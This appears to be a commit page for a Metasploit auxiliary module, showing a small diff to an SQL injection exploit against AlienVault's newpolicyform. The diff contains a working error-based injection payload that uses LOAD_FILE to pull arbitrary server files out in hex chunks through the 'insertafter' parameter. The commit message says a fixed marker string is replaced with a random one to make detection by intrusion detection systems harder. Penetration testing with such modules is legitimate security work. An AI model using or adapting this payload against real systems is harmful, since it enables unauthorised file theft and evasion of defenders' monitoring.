Update alienvault_newpolicyform_sqli.rb

enhanced as requested by Christian Mehlmauer changed xnDa to a random string to make IDS harder to detect.
2014-05-10 20:17:30 -04:00 · 2014-05-10 20:17:30 -04:00 · 3ae3c478bd
parent 1affbfbe9d
commit 3ae3c478bd
1 changed files with 3 additions and 3 deletions
--- a/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb
+++ b/modules/auxiliary/gather/alienvault_newpolicyform_sqli.rb
@ -109,7 +109,7 @@ class Metasploit4 < Msf::Auxiliary
    print_status("#{peer} - Exploiting SQLi...")
    loop do
-      file = sqli(left_marker, right_marker, i, cookie, filename)
+      file = sqli(left_marker, right_marker, sql_true, i, cookie, filename)
      return if file.nil?
      break if file.empty?
@ -124,11 +124,11 @@ class Metasploit4 < Msf::Auxiliary
    print_good("File stored at path: " + path)
  end
-  def sqli(left_marker, right_marker, i, cookie, filename)
+  def sqli(left_marker, right_marker, sql_true, i, cookie, filename)
    pay =  "X') AND (SELECT 1170 FROM(SELECT COUNT(*),CONCAT(0x#{left_marker.unpack("H*")[0]},"
    pay << "(SELECT MID((IFNULL(CAST(HEX(LOAD_FILE(0x#{filename})) AS CHAR),"
    pay << "0x20)),#{(50*i)+1},50)),0x#{right_marker.unpack("H*")[0]},FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS"
-    pay << " GROUP BY x)a) AND ('xnDa'='xnDa"
+    pay << " GROUP BY x)a) AND ('0x#{sql_true.unpack("H*")[0]}'='0x#{sql_true.unpack("H*")[0]}"
    get = {
      'insertafter' => pay,